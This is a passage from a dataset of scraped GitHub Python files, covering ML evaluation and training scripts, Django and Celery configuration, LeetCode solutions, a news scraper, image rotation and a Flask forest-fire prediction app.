Loaded\\n')\n\nprint('\\n\\nLoading Melody:')\nacc_mel = compute_test_acc(model_path_mel, dataset_mel, use_saved_set=use_saved_set)\n#print('Melody Loaded\\n')\n\nprint('\\n\\nLoading Melody weighted:')\nacc_mel_w = compute_test_acc(model_path_mel_w, dataset_mel_w, use_saved_set=use_saved_set)\n#print('Melody weighted Loaded\\n')\n\nprint('\\n\\nLoading Melody + Duration:')\nacc_mel_dur = compute_test_acc(model_path_mel_dur, dataset_mel_dur, use_saved_set=use_saved_set)\n#print('Melody + Duration Loaded\\n')\n\nprint('\\n\\nLoading Bass:')\nacc_bass = compute_test_acc(model_path_bass, dataset_bass, use_saved_set=use_saved_set)\n#print('Bass Loaded\\n')\n\nprint('\\n\\nLoading Melody + Bass:')\nacc_mel_bass = compute_test_acc(model_path_mel_bass, dataset_mel_bass, use_saved_set=use_saved_set)\n#print('Melody + Bass: Loaded\\n')\n\n\n\nprint('\\n\\n-----------------------------------------')\nprint('| Model\\t\\t\\t| Test accuracy |')\nprint('-----------------------------------------')\nprint('| Baseline\\t\\t| %.2f %% \\t|' % acc_baseline)\nprint('-----------------------------------------')\nprint('| Melody\\t\\t| %.2f %% \\t|' % acc_mel)\nprint('| Melody weighted\\t| %.2f %% \\t|' % acc_mel_w)\nprint('| Melody duration\\t| %.2f %% \\t|' % acc_mel_dur)\nprint('| Bass\\t\\t\\t| %.2f %% \\t|' % acc_bass)\nprint('| Melody + Bass\\t\\t| %.2f %% \\t|' % acc_mel_bass)\nprint('-----------------------------------------\\n')\n","repo_name":"nereaiscamu/ML_project2","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70016252967","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n 
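# Sketch of the load-and-evaluate pattern used above, assuming torch is
# installed; the model and file name here are stand-ins, not the project's
# real LSTM_Multihot checkpoint.
import torch
import torch.nn as nn

model = nn.Linear(4, 2)                     # stand-in architecture
torch.save(model.state_dict(), "demo.pth")  # what training would have saved

restored = nn.Linear(4, 2)                  # must match the saved architecture
restored.load_state_dict(torch.load("demo.pth"))
restored.eval()                             # disable dropout/batch-norm updates
with torch.no_grad():
    print(restored(torch.zeros(1, 4)))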
migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('formacion', '0040_auto_20160101_1538'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='RevisionInterventoriaDocenteSoporteActividades',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha', models.DateTimeField(auto_now_add=True)),\n ('ip', models.IPAddressField(null=True, blank=True)),\n ('evidencia', models.ManyToManyField(to='formacion.EvidenciaDocentes', null=True, blank=True)),\n ('usuario', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='RevisionInterventoriaEscuelaTicSoporteActividades',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha', models.DateTimeField(auto_now_add=True)),\n ('ip', models.IPAddressField(null=True, blank=True)),\n ('evidencia', models.ManyToManyField(to='formacion.EvidenciaEscuelaTic', null=True, blank=True)),\n ('usuario', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"Dandresfsoto/Andes","sub_path":"formacion/migrations/0041_revisioninterventoriadocentesoporteactividades_revisioninterventoriaescuelaticsoporteactividades.py","file_name":"0041_revisioninterventoriadocentesoporteactividades_revisioninterventoriaescuelaticsoporteactividades.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9921719271","text":"def reverseWords(self, s: str) -> str:\n i = 0\n t = list(s)\n while i < len(t):\n start = i\n end = i\n while end < len(s) and s[end] != \" \":\n end += 1\n i = end\n end -= 1\n while start < end:\n temp = s[start]\n t[start] = s[end]\n t[end] = s[start]\n start += 1\n end -= 1\n i += 1\n return ''.join(t)\n\n\na = \"Let's take LeetCode contest\"\nans = reverseWords(0, a)\nprint(ans)\n","repo_name":"baszabilsal/LeetCode_DataStructureAndAlgorithm","sub_path":"Algorithm/557_ReverseWordsInAString3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70046974569","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 21 15:18:51 2021\n\n@author: galih-hermawan\n\"\"\"\n\nfrom libHobiMahasiswa import ManajemenBerkas, UtilitasFileKode, Utilitas\nimport re\n\nut = Utilitas()\nutFK = UtilitasFileKode() \ndelimiter = utFK.PemisahKolom()\nlstFile, lstKolomKode = utFK.AmbilKodeDataFile()\nlstPolaFile, lstKolomPola = utFK.AmbilKodePola()\n\n# pola regex untuk menerima minimal 1 karakter apapun\npolaUmum = \"^.+$\"\n\nfMhs, fHobi, fMhsHobi = lstFile[0], lstFile[1], lstFile[2]\n\ndataMhs = ManajemenBerkas(lstFile[0]).BacaBerkas()\ndataHobi = ManajemenBerkas(lstFile[1]).BacaBerkas()\ndataMhsHobi = ManajemenBerkas(lstFile[2]).BacaBerkas()\nkamus = utFK.KamusFile_Kode(delimiter)\n\ndaftarKode = utFK.DaftarKolom(lstKolomKode, delimiter)\ndaftarPola = utFK.DaftarKolom(lstKolomPola, delimiter)\n# pola kolom yang kosong diisi dengan pola umum\nfor dp in range(len(daftarPola)):\n daftarPola[dp] = [polaUmum if d==\"\" else d for i, d in enumerate(daftarPola[dp])]\n\npolaMhs = daftarPola[0]\npolaHobi = daftarPola[1]\npolaMhsHobi = daftarPola[2]\n\n# tampil menu\nlstPil = []\nj = 0\nprint(\"Data yang ingin diperbarui:\")\nfor i in range(len(lstFile)):\n j += 1\n lstPil.append(j)\n print(f\"({j}) {lstFile[i]}.\")\n\nstrPil = [str(x) for x in lstPil]\nlstStrPil 
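# The LeetCode snippet above reverses each word in place with two pointers;
# the same result via slicing (stdlib only), useful as a cross-check.
def reverse_words(s):
    return " ".join(w[::-1] for w in s.split(" "))

assert reverse_words("Let's take LeetCode contest") == "s'teL ekat edoCteeL tsetnoc"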
= \"/\".join(strPil)\npil = input(f\"Tulis angka menu ({lstStrPil}) atau ketik apapun untuk keluar : \")\n\nif pil.isdigit(): pil = int(pil)\n\n# menu update data mahasiswa\nif pil == 1:\n lstDataMasukan = []\n kodeCari = input(\"Masukkan nim: \")\n barisMhsDitemukan = ut.CariData(kodeCari, 0, dataMhs, delimiter, True)\n if barisMhsDitemukan:\n lstDataMasukan.append(kodeCari)\n barisDataLama = ut.AmbilData(barisMhsDitemukan, dataMhs, delimiter)[0]\n print(\"Kosongkan data jika akan menggunakan data lama.\")\n for i in range(1,len(daftarKode[0])):\n nmKolom = daftarKode[0][i]\n dataKolom = dataMhsDitemukan = ut.AmbilData(barisMhsDitemukan, dataMhs, delimiter, [i])\n while True: \n dataMasukan = input(f\"Data {nmKolom} lama '{dataKolom[0]}', data baru: \") \n if dataMasukan.strip():\n if re.match(polaMhs[i], dataMasukan):\n dataKolomBaru = dataMasukan\n break\n else:\n print(f\"Format '{nmKolom}' tidak sesuai.\")\n else:\n dataKolomBaru = dataKolom[0]\n break\n lstDataMasukan.append(dataKolomBaru)\n #print(\"Data baru: \",lstDataMasukan)\n barisDataBaru = delimiter.join(lstDataMasukan)\n #print(barisDataBaru)\n dataBaru = ut.UpdateData(barisDataLama, barisDataBaru, dataMhs)\n #print(dataBaru)\n ManajemenBerkas(fMhs).TulisBerkas(dataBaru)\n print(\"Pembaruan data berhasil dilakukan.\")\n else:\n print(f\"Data nim '{kodeCari}' tidak ditemukan.\")\n\n# menu update data hobi\nelif pil==2:\n kodeCari = input(\"Masukkan kode hobi: \")\n barisHobiDitemukan = ut.CariData(kodeCari, 0, dataHobi, delimiter, True)\n if barisHobiDitemukan:\n nmHobiBaruSudahAda = False\n barisDataLama = ut.AmbilData(barisHobiDitemukan, dataHobi, delimiter)[0]\n nmHobiLama = ut.AmbilData(barisHobiDitemukan, dataHobi, delimiter, [1])[0]\n print(\"Kosongkan data jika ingin menggunakan data lama.\")\n nmHobi = input(f\"Data lama: '{nmHobiLama}', data baru: \")\n nmHobi.strip()\n if nmHobi:\n nmHobiBaru = nmHobi\n # cek apakah hobi baru sudah pernah ada di data hobi\n nmHobiBaruSudahAda = ut.CariData(nmHobiBaru, 1, dataHobi, delimiter, True)\n else:\n nmHobiBaru = nmHobiLama\n \n if nmHobiBaruSudahAda:\n print(\"Nama hobi baru sudah ada.\")\n else:\n barisDataBaru = delimiter.join([kodeCari, nmHobiBaru])\n print(barisDataBaru)\n dataBaru = ut.UpdateData(barisDataLama, barisDataBaru, dataHobi)\n ManajemenBerkas(fHobi).TulisBerkas(dataBaru)\n print(\"Pembaruan data berhasil dilakukan.\")\n else:\n print(f\"Data kode hobi '{kodeCari}' tidak ditemukan.\")\n# menu update data mhshobi\nelif pil==3:\n kodeCari = input(\"Masukkan nim: \")\n barisMhsDitemukan = ut.CariData(kodeCari, 0, dataMhsHobi, delimiter, True)\n if barisMhsDitemukan:\n nmHobiBaruSudahAda = False\n # jml hobi mungkin lebih dari satu\n barisDataLama = ut.AmbilData(barisMhsDitemukan, dataMhsHobi, delimiter)\n kodeHobiLama = ut.AmbilData(barisMhsDitemukan, dataMhsHobi, delimiter, [1])\n lstKodeHobiBaru = []\n print(f\"Kode hobi lama: {kodeHobiLama}\")\n print(\"Kosongkan data jika ingin menggunakan data lama.\")\n for i, data in enumerate(kodeHobiLama):\n while True:\n kodeHobi = input(f\"Data lama {i+1}: '{kodeHobiLama[i]}', data baru: \")\n kodeHobi.strip()\n # periksa apakah kodehobi terdaftar di data Hobi\n kodeHobiTerdaftar = ut.CariData(kodeHobi, 0, dataHobi, delimiter, True)\n if not kodeHobi: #kodehobi dikosongkan, menyimpan data lama\n lstKodeHobiBaru.append(data)\n break\n elif not kodeHobiTerdaftar:\n print(f\"Kode hobi {kodeHobi} belum terdaftar di data Hobi.\")\n elif kodeHobi in kodeHobiLama and kodeHobi != data:\n print(f\"Kode hobi {kodeHobi} sudah 
pernah disimpan.\")\n else:\n lstKodeHobiBaru.append(kodeHobi)\n break\n \n barisDataBaru = [delimiter.join([kodeCari,i] )for i in lstKodeHobiBaru] \n \n print(\"Data baru: \",barisDataBaru)\n dataBaru = ut.UpdateData(barisDataLama, barisDataBaru, dataMhsHobi)\n #print(dataBaru)\n ManajemenBerkas(fMhsHobi).TulisBerkas(dataBaru)\n print(\"Pembaruan data berhasil dilakukan.\")\n else:\n print(f\"Data kode hobi '{kodeCari}' tidak ditemukan.\")\nelse:\n print(\"Keluar aplikasi.\")\n\n","repo_name":"galihboy/HobiMahasiswa","sub_path":"console-optimized/updateData.py","file_name":"updateData.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"id","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73642919208","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 11 17:12:34 2020\r\n\r\n@author: Jasar Althaf\r\n\"\"\"\r\n\r\n#importing packages\r\nimport requests\r\nimport urllib.request\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nfrom gensim.summarization.summarizer import summarize\r\nfrom gensim.summarization import keywords\r\n\r\n\r\n\r\nurl=['https://timesofindia.indiatimes.com/home/education/news/career-in-data-science-in-india-courses-certification-salary-future-growth/articleshow/75023624.cms',\r\n 'https://timesofindia.indiatimes.com/india/62064-more-covid-19-cases-in-india-recoveries-cross-15-lakh-mark/articleshow/77456041.cms',\r\n 'https://timesofindia.indiatimes.com/world/pakistan/pakistan-us-review-bilateral-relationship/articleshow/77503580.cms',\r\n 'https://timesofindia.indiatimes.com/india/as-china-factor-looms-india-hopes-to-work-with-lankas-rajapaksas-for-development/articleshow/77509553.cms',\r\n 'https://timesofindia.indiatimes.com/sports/football/champions-league/top-stories/thousands-have-tried-bayern-munich-ponder-how-to-stop-messi/articleshow/77489723.cms']\r\n\r\nsection=['section1','clearfix rel','clearfix rel','clearfix rel','clearfix rel']\r\n\r\n\r\ndef fun(url,section):\r\n article = ''\r\n response = requests.get(url)\r\n#initializing parser\r\n soup = BeautifulSoup(response.text, \"html.parser\")\r\n#Fetching Div = \"section1\" data\r\n content = soup.find('div', {\"class\": section})\r\n#Creating the text data\r\n for i in content.findAll('div'):\r\n article = article + ' ' + i.text\r\n keywor=keywords(article).split('\\n')\r\n summary=(summarize(article,ratio=0.25))\r\n return article,keywor,summary\r\n\r\ndata=[]\r\n\r\ndef funtion(url,text,key,summary):\r\n for i in range(0,length):\r\n data.append({\r\n 'url':url[i],\r\n 'text':text[i],\r\n 'key':key[i],\r\n 'summary':summary[i]})\r\n \r\n return data\r\n\r\n\r\nlength=len(url)-1\r\n\r\ntext=[]\r\nkey=[]\r\nsummary=[]\r\n\r\n\r\n\r\nfor i in range(0,length):\r\n tex,keyw,summa=fun(url[i],section[i])\r\n text.append(tex)\r\n key.append(keyw)\r\n summary.append(summa)\r\n \r\n \r\n \r\ndata=funtion(url,text,key,summary)\r\n\r\n\r\ndf=pd.DataFrame(data)\r\n\r\n\r\ndf.head()\r\n","repo_name":"althafjasar/webscarpping-and-recommendation","sub_path":"incent/DATA SCRAPPING.PY","file_name":"DATA SCRAPPING.PY","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10727662101","text":"import cv2\nimport numpy as np\n\n\ndef backward_transform(img, angle):\n height, width = img.shape\n result = np.zeros((height, width), np.uint8)\n\n affine = np.array([[np.cos(np.radians(angle)), np.sin(np.radians(angle)), 0],\n 
[-np.sin(np.radians(angle)), np.cos(np.radians(angle)), 0],\n [0, 0, 1]])\n\n for x in range(width):\n for y in range(height):\n p = affine.dot(np.array([x, y, 1]))\n xp = int(p[0])\n yp = int(p[1])\n\n if 0 <= yp < height and 0 <= xp < width:\n result[y, x] = img[yp, xp]\n return result\n\n\nin_image = cv2.imread('sample.jpg', 0)\nout_image = backward_transform(in_image, 20)\n\ncv2.imshow('input', in_image)\ncv2.imshow('output', out_image)\n\ncv2.imwrite('bw_transformed.jpg', out_image)\ncv2.waitKey()","repo_name":"ruhz3/img-processing","sub_path":"backward mapping/backward_mapping.py","file_name":"backward_mapping.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9254701529","text":"from contextlib import asynccontextmanager\nfrom typing import AsyncGenerator\nfrom bson import ObjectId\nfrom sqlalchemy import inspect\nfrom sqlalchemy.ext.asyncio import AsyncSession, create_async_engine\nfrom sqlalchemy.ext.declarative import as_declarative\nfrom sqlalchemy.orm import sessionmaker\n\nfrom netcore.config import settings\nimport motor.motor_asyncio\n\nengine = create_async_engine(settings.database_url, future=True, echo=True)\nasync_session = sessionmaker(\n bind=engine, expire_on_commit=False, class_=AsyncSession, autocommit=False, autoflush=False\n)\n\n\n@as_declarative()\nclass Base:\n \"\"\"\n Base class to inherit from when we want to create a table in the database.\n I customized it to be able to give ORM object as dict to convert them into Pydantic objects if needed.\n You can see an example in graphql module.\n \"\"\"\n\n def _asdict(self):\n return {c.key: getattr(self, c.key) for c in inspect(self).mapper.column_attrs}\n\n\n@asynccontextmanager\nasync def get_session() -> AsyncGenerator[AsyncSession, None]:\n \"\"\"_summary_\n This function return a session usable within an async context manager in another submodule for example.\n The goal is to have access to the database as easy as possible.\n\n Returns:\n AsyncGenerator[AsyncSession, None]\n\n Yields:\n Iterator[AsyncGenerator[AsyncSession, None]]\n \"\"\"\n async with async_session() as session:\n async with session.begin():\n try:\n yield session\n finally:\n await session.close()\n\n\nclient = motor.motor_asyncio.AsyncIOMotorClient(settings.mongodb_url)\nmongodb = client.netcore # it is the database name right here\n\n\nclass PyObjectId(ObjectId):\n \"\"\"\n MongoDB stores objects as BSON, ObjectId let us convert it as JSON dict easily with Python.\n This class allow us to use ObjectId stored in MongoDB as Pydantic Field.\n \"\"\"\n\n @classmethod\n def __get_validators__(cls):\n yield cls.validate\n\n @classmethod\n def validate(cls, v):\n if not ObjectId.is_valid(v):\n raise ValueError(\"Invalid objectid\")\n return ObjectId(v)\n\n @classmethod\n def __modify_schema__(cls, field_schema):\n field_schema.update(type=\"string\")\n","repo_name":"Never77/fastapi-sample-project","sub_path":"netcore/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15177387575","text":"import sys\r\nimport os\r\n\r\ncurPath = os.path.abspath(os.path.dirname(__file__))\r\nrootPath = os.path.split(curPath)[0]\r\nsys.path.append(rootPath)\r\n\r\nimport torch.nn as nn\r\nimport torch\r\nfrom matplotlib import pyplot as plt\r\nfrom matplotlib.pyplot import specgram\r\nfrom torch.autograd import 
Variable\r\nimport scipy.io as scio\r\nimport librosa\r\nimport numpy as np\r\nfrom net.net import Net\r\nfrom load_data.SpeechDataLoad import SpeechDataset, FeatureCreator\r\n\r\nfrom torch.utils.data import DataLoader\r\nimport torch.optim as optim\r\nfrom utils.model_handle import save_model, resume_model\r\nfrom utils.loss_set import LossHelper,SISDRLoss\r\nfrom utils.pesq import pesq\r\nimport progressbar\r\nfrom config import *\r\nfrom utils.util import get_alpha, expandWindow\r\nimport time\r\nfrom utils.stft_istft import STFT\r\nfrom tensorboardX import SummaryWriter\r\nfrom utils.label_set import LabelHelper\r\n\r\nimport pickle\r\n\r\n\r\ndef load_obj(root_dir, name):\r\n with open(root_dir + name, 'rb') as f:\r\n return pickle.load(f)\r\n\r\n\r\nclass BatchInfo(object):\r\n\r\n def __init__(self, speech, mix, frame):\r\n self.speech = speech\r\n self.mix = mix\r\n self.frame = frame\r\n\r\n\r\ndef collate(batch):\r\n \"\"\"\r\n 将每个batch中的数据pad成一样长,采取补零操作\r\n 切记为@staticmethod方法\r\n :param batch:input和label的list\r\n :return:input、label和真实帧长的list\r\n \"\"\"\r\n speech_lst = []\r\n mix_lst = []\r\n frame_size_lst = []\r\n for item in batch:\r\n speech = item[0]\r\n mix = item[1]\r\n speech = speech / torch.max(torch.abs(speech)) # 幅值归一化\r\n mix = mix / torch.max(torch.abs(mix))\r\n speech_lst.append(speech)\r\n mix_lst.append(mix)\r\n # 计算帧长((语音长度-窗长度)/帧移)\r\n frame = (item[0].shape[0] - FILTER_LENGTH) // HOP_LENGTH + 1\r\n # 存储每句话的真实帧长,用于计算loss\r\n frame_size_lst.append(frame)\r\n speech_lst = nn.utils.rnn.pad_sequence(speech_lst)\r\n mix_lst = nn.utils.rnn.pad_sequence(mix_lst)\r\n return BatchInfo(speech_lst, mix_lst, frame_size_lst)\r\n\r\n\r\ndef validation(net, path, type):\r\n net.eval()\r\n file = os.listdir(path)\r\n # label_helper = LabelHelper()\r\n # mse = nn.MSELoss()\r\n SI_SDR = SISDRLoss()\r\n sum_loss = 0\r\n\r\n stft = STFT(filter_length=FILTER_LENGTH, hop_length=HOP_LENGTH).cuda(CUDA_ID[0])\r\n if type == 0:\r\n n = 50\r\n else:\r\n n = VALIDATION_DATA_NUM\r\n bar = progressbar.ProgressBar(0, n)\r\n for i in range(n):\r\n bar.update(i)\r\n with torch.no_grad():\r\n data = load_obj(VALIDATION_DATA_PATH, file[i])\r\n # 迭代输出需要的文件\r\n speech = np.array(data['speech'])\r\n speech = torch.Tensor(speech[np.newaxis, :])\r\n mix = np.array(data['mix'])\r\n mix = torch.Tensor(mix[np.newaxis, :])\r\n speech = speech / torch.max(torch.abs(speech)) # 幅值归一化\r\n mix = mix / torch.max(torch.abs(mix))\r\n speech_spec = stft.transform(speech.cuda(CUDA_ID[0]))\r\n speech_mag = stft.spec_transform(speech_spec)\r\n mix_spec = stft.transform(mix.cuda(CUDA_ID[0]))\r\n\r\n output = net(mix_spec)\r\n output_mag = torch.sqrt(output[:, :, :, 0] ** 2 + output[:, :, :, 1] ** 2)\r\n loss = LossHelper.single_spec_mag_loss(torch.cat([output,output_mag.unsqueeze(-1)],dim=-1), torch.cat([speech_spec,speech_mag.unsqueeze(-1)],dim=-1))\r\n # loss = mse(output, speech_spec)\r\n # loss = SI_SDR(output,speech_spec)\r\n sum_loss += loss.item()\r\n bar.finish()\r\n return sum_loss / n\r\n\r\n\r\ndef train(net, epoch, data_loader, optimizer):\r\n global global_step\r\n global global_time\r\n global LR\r\n writer = SummaryWriter(LOG_STORE)\r\n feature_creator = FeatureCreator()\r\n SI_SDR=SISDRLoss()\r\n # stft = STFT(filter_length=FILTER_LENGTH, hop_length=HOP_LENGTH).cuda(CUDA_ID[0])\r\n bar = progressbar.ProgressBar(0, train_data_set.__len__() // TRAIN_BATCH_SIZE)\r\n for i in range(epoch):\r\n if i%2==0 and i!=0:\r\n if LR > 1e-8:\r\n LR = LR/2\r\n optimizer.param_groups[0]['lr'] = LR\r\n sum_loss = 
0\r\n bar.start()\r\n for batch_idx, batch_info in enumerate(data_loader):\r\n mix_spec, speech_spec,speech_mag,frame = feature_creator(batch_info)\r\n\r\n bar.update(batch_idx)\r\n output = net(mix_spec.cuda(CUDA_ID[0]))\r\n output_mag = torch.sqrt(output[:, :, :, 0] ** 2 + output[:, :, :, 1] ** 2)\r\n loss = LossHelper.spec_mag_loss(torch.cat([output,output_mag.unsqueeze(-1)],dim=-1), torch.cat([speech_spec,speech_mag.unsqueeze(-1)],dim=-1), frame)\r\n # loss = SI_SDR(output,speech_spec)\r\n # loss = LossHelper.mse_loss(output.cuda(CUDA_ID[0]), speech_spec.cuda(CUDA_ID[0]), frame)\r\n sum_loss += loss.item()\r\n\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n # 10次打一次loss\r\n if global_step % 10 == 0 and global_step != 0:\r\n writer.add_scalar('Train/Loss', sum_loss / global_time, global_step)\r\n # cv_loss = validation(net, VALIDATION_DATA_PATH, 0)\r\n # writer.add_scalar('Train/CV_Loss', cv_loss, global_step)\r\n # net.train()\r\n global_time = 0\r\n sum_loss = 0\r\n global_time += 1\r\n global_step += 1\r\n # if global_step % 100 == 0 and global_step != 0:\r\n # save_model(net, optimizer, loss, models_path=MODEL_STORE + 'middle_store/model_' + str(i) + '_' + str(global_step // 1000) +'.pkl')\r\n cv_loss = validation(net, VALIDATION_DATA_PATH, 1)\r\n writer.add_scalar('Train/CV_Loss', cv_loss, global_step)\r\n net.train()\r\n save_model(net, optimizer, cv_loss, models_path=MODEL_STORE + 'model_' + str(i) + '.pkl')\r\n bar.finish()\r\n\r\n\r\nglobal_step = 0\r\nglobal_time = 0\r\n\r\nif __name__ == \"__main__\":\r\n # 初始化训练集\r\n train_data_set = SpeechDataset(TRAIN_DATA_PATH)\r\n train_data_loader = DataLoader(dataset=train_data_set,\r\n batch_size=TRAIN_BATCH_SIZE,\r\n shuffle=True,\r\n collate_fn=collate,\r\n num_workers=8,\r\n pin_memory=True\r\n )\r\n NET = Net()\r\n NET = NET.cuda(CUDA_ID[0])\r\n NET = nn.DataParallel(NET)\r\n # optimizer,loss=resume_model(NET, MODEL_STORE + '/model_2.pkl')\r\n train_optimizer = optim.Adam(NET.parameters(), lr=LR)\r\n # train_optimizer.load_state_dict(optimizer)\r\n # train_optimizer.param_groups[0]['lr'] = LR\r\n train(NET, EPOCH, train_data_loader, train_optimizer)\r\n","repo_name":"YingMa-cc/speech-enhancement-of-FM-speech","sub_path":"FM_enhancement/train/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6222253769","text":"class Solution:\n # @return a list of strings, [s1, s2]\n def letterCombinations(self, digits):\n a = [ [], [], ['a', 'b', 'c' ], [ 'd', 'e', 'f' ], [ 'g', 'h', 'i'], [ 'j', 'k', 'l' ], [ 'm', 'n', 'o' ], [ 'p', 'q', 'r', 's' ], [ 't', 'u', 'v' ], [ 'w', 'x', 'y', 'z' ] ]\n res = [ '' ]\n for d in digits:\n k = int(d)\n tmp = []\n for word in res:\n for w in a[k]:\n tmp.append(word + w)\n res = tmp\n return res","repo_name":"Shuaiyicao/leetcode-python","sub_path":"17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26897163438","text":"from typing import List\nimport heapq\n\ndef minInterval(intervals: List[List[int]], queries: List[int]) -> List[int]:\n intervals.sort()\n minHeap = []\n res = {}\n i = 0\n for q in sorted(queries):\n while i < len(intervals) and intervals[i][0] <= q:\n l, r = intervals[i]\n heapq.heappush(minHeap, (r - l + 1, r))\n i += 1\n\n while minHeap and minHeap[0][1] < q:\n heapq.heappop(minHeap)\n res[q] = minHeap[0][0] 
if minHeap else -1\n    return [res[q] for q in queries]\n\nintervals = [[1,4],[2,4],[3,6],[4,4]]\nqueries = [2,3,4,5]\nprint(minInterval(intervals, queries))\n\nintervals = [[2,3],[2,5],[1,8],[20,25]]\nqueries = [2,19,5,22]\nprint(minInterval(intervals, queries))\n\n\"\"\"\nThis code defines a function `minInterval` that, for each query point, finds the\nsmallest interval containing it and returns that interval's length.\n\nOutline:\n- Sort the intervals by start point and process the queries in sorted order.\n- For each query point, push every interval that could contain it onto a min-heap.\n- Pop intervals that end before the current query point.\n- The smallest covering interval then sits at the top of the heap.\n- Results are stored in a dict and returned in the original query order.\n\nStep by step:\n1. `intervals.sort()` sorts the intervals by start point.\n2. `minHeap = []` initialises the min-heap.\n3. `res = {}` holds the result for each query.\n4. `i = 0` tracks the current interval index.\n5. `for q in sorted(queries):` iterates over the queries in sorted order.\n6. The first `while` pushes onto the heap every interval whose start is <= q.\n7. `heapq.heappush(minHeap, (r - l + 1, r))` stores (length, end); the length\n   comes first so the heap is ordered by interval size.\n8. The second `while` pops intervals that end before q, since they can no\n   longer cover this or any later query.\n9. `res[q] = minHeap[0][0] if minHeap else -1` records the length of the\n   smallest covering interval, or -1 if none exists.\n10. Finally, the results are returned in the order of the original queries.\n\"\"\"
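\n\n# Added note (not from the original author): sorting dominates the cost, and each\n# interval is pushed and popped at most once, so the total running time is roughly\n# O(n log n + q log q + (n + q) log n) for n intervals and q queries.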
","repo_name":"majikojima/neetcode","sub_path":"16_Intervals/04_MinimumIntervalToIncludeEachQuery.py","file_name":"04_MinimumIntervalToIncludeEachQuery.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26903328854","text":"from __future__ import absolute_import, unicode_literals\n\nimport sys\n\nfrom celery import Celery\nimport os\nfrom django.conf import settings  # fix: 'settings' is used below but was never imported\n# from note import tasks\nsys.path.append(os.path.abspath('vm_bm_test'))\n# set the default Django settings module for the 'celery' program.\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'vm_bm_test.settings')\n\napp = Celery('vm_bm_test')\n# app.config_from_object('django.conf:settings', namespace='CELERY')\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\napp.conf.beat_schedule = {\n    'add-every-30-seconds': {\n        'task': 'vm_bm.tasks.json_adaptor_process',\n        'schedule': 30.0,\n    },\n}\n# from __future__ import absolute_import\n# import os\n# from celery import Celery\n# from django.conf import settings\n# os.environ.setdefault('DJANGO_SETTINGS_MODULE','vm_bm_test.settings')\n# app = Celery('vm_bm_test')\n# app.config_from_object('django.conf:settings')\n# app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)","repo_name":"mdhussain7/md_vm_bm_check","sub_path":"vm_bm_test/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"24866463497","text":"from flask import Flask,request, url_for, redirect, render_template\r\nimport pickle\r\nimport numpy as np\r\nimport os\r\nfrom jinja2 import debug\r\n\r\napp = Flask(__name__)\r\n\r\nmodel = pickle.load(open('model.pkl','rb'))\r\n\r\n@app.route('/')\r\ndef saludo():\r\n    return render_template('indice.html')  # fix: original path 'tempplates/indice.html' was a typo\r\n\r\n@app.route('/predict', methods=['POST','GET'])\r\ndef predecir():\r\n    int_features = [int(x) for x in request.form.values()]\r\n    final = [np.array(int_features)]\r\n    print(int_features)\r\n    print(final)\r\n    prediccion = model.predict_proba(final)\r\n    salida = '{0:.{1}f}'.format(prediccion[0][1],2)\r\n    print(\"Cantidad pred: \",salida)\r\n\r\n    # note: the {1} in '{0:.{1}f}' is the precision argument, i.e. two digits after the decimal point\r\n\r\n    if float(salida) > 0.5:  # fix: compare numerically instead of comparing strings\r\n        return render_template('indice.html', pred= 'El bosque se encuentra en peligro.\\nLas Probabilidades de que ocurra un incendio es de {}'.format(salida), bhai=\"Hay algo por hacer ahora?\")\r\n    else:\r\n        return render_template('indice.html', pred= 'El bosque se encuentra a salvo.\\nLas Probabilidades de que ocurra un incendio es de {}'.format(salida), bhai=\"Todo se encuentra sano y salvo\")\r\n\r\nif __name__ == '__main__':\r\n    port = int(os.environ.get('PORT', 5000))\r\n    app.run(host='0.0.0.0', 